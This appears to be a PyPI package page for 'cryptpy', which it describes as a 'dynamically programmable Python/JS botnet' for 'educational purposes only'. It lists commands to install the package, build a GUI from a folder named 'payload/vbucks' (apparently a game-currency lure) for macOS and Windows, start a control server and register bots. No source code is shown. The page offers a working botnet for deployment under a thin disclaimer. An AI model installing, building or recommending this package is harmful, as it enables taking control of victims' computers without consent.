Dynamically programmable Python/JS botnet (educational purposes only).
Project description
Dynamically programmable Python botnet (educational purposes only).
Installation
Core Installation with PIP (botnet sources)
pip install cryptpy
Building the Node Source (GUI Implementation)
Note: requires installation of cryptpy
First, cd payload/vbucks
.
Build for MacOS:
-
npm i
-
yarn dist
Build for Windows:
-
npm i
-
npm run dist
Usage
Start a Server:
cryptpy --server --terminal
Start and Register a Bot:
cryptpy
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
cryptpy-0.3.5.tar.gz
(9.2 kB
view hashes)
Built Distribution
cryptpy-0.3.5-py3-none-any.whl
(13.3 kB
view hashes)